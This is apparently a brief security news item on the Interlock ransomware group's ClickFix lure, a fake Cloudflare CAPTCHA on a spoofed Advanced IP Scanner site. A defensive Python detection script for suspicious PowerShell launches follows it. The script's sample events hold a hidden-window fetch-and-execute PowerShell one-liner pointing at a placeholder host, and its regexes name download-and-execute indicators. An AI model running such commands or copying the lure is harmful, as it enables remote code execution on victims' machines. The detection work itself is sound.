Ransomware group Interlock is using the ClickFix technique to target businesses, posing as the Advanced IP Scanner website.
Interlock lures victims to a fake CAPTCHA page imitating Cloudflare, tricking them into executing a malicious PowerShell command.
Once the command is executed, a fake PyInstaller installer launches, allowing Interlock to collect system information and deploy malware such as a remote access Trojan.
To protect against ClickFix attacks, it is recommended to raise employee awareness, install reliable protection on devices, monitor for suspicious activities, and consider external threat hunting services.
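
One way to act on the monitoring recommendation, added here as an example and not taken from the article: flag PowerShell that is started directly by explorer.exe and whose command line combines hidden-window, download or expression-invocation indicators. The event field names, hosts, URLs, regex heuristics and the premise that the victim pastes the command into the Windows Run dialog are assumptions made for this example.

```python
import ntpath
import re

# Assumption (not from the article): the lure has the victim paste the command
# into the Windows Run dialog, so PowerShell starts as a child of explorer.exe.
SHELLS = {"powershell.exe", "pwsh.exe"}
INDICATORS = {  # heuristic patterns chosen for this example
    "hidden_window": re.compile(r"-w(?:in\w*)?\s+(?:h\w*|1)\b", re.I),
    "encoded_command": re.compile(r"\s-e(?:c|nc\w*)?\s", re.I),
    "download": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}

def score_event(event):
    """Return sorted indicator names for PowerShell launched from explorer.exe."""
    if ntpath.basename(event["image"]).lower() not in SHELLS:
        return []
    if ntpath.basename(event["parent_image"]).lower() != "explorer.exe":
        return []
    return sorted(n for n, rx in INDICATORS.items() if rx.search(event["command_line"]))

def find_suspects(events, min_hits=2):
    """Return (host, indicators) for events matching at least min_hits indicators."""
    return [(e["host"], hits) for e in events if len(hits := score_event(e)) >= min_hits]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed process-creation events (hypothetical field names and hosts).
EVENTS = [
    {"host": "WS-01", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell -w hidden -c "iex (irm https://example.invalid/placeholder)"'},
    {"host": "WS-02", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"host": "SRV-03", "image": PS, "parent_image": r"C:\Program Files\ExampleAgent\agent.exe",
     "command_line": r"powershell -WindowStyle Hidden -Command irm https://example.invalid/inventory"},
    {"host": "WS-04", "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"pwsh -NoProfile -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for host, hits in find_suspects(EVENTS):
        print(host, hits)
```

Only WS-01 is reported: the interactive shell and the script launch from explorer.exe carry no indicators, and the hidden download on SRV-03 comes from a management agent rather than a user's desktop session, so it falls outside this rule and needs its own baseline.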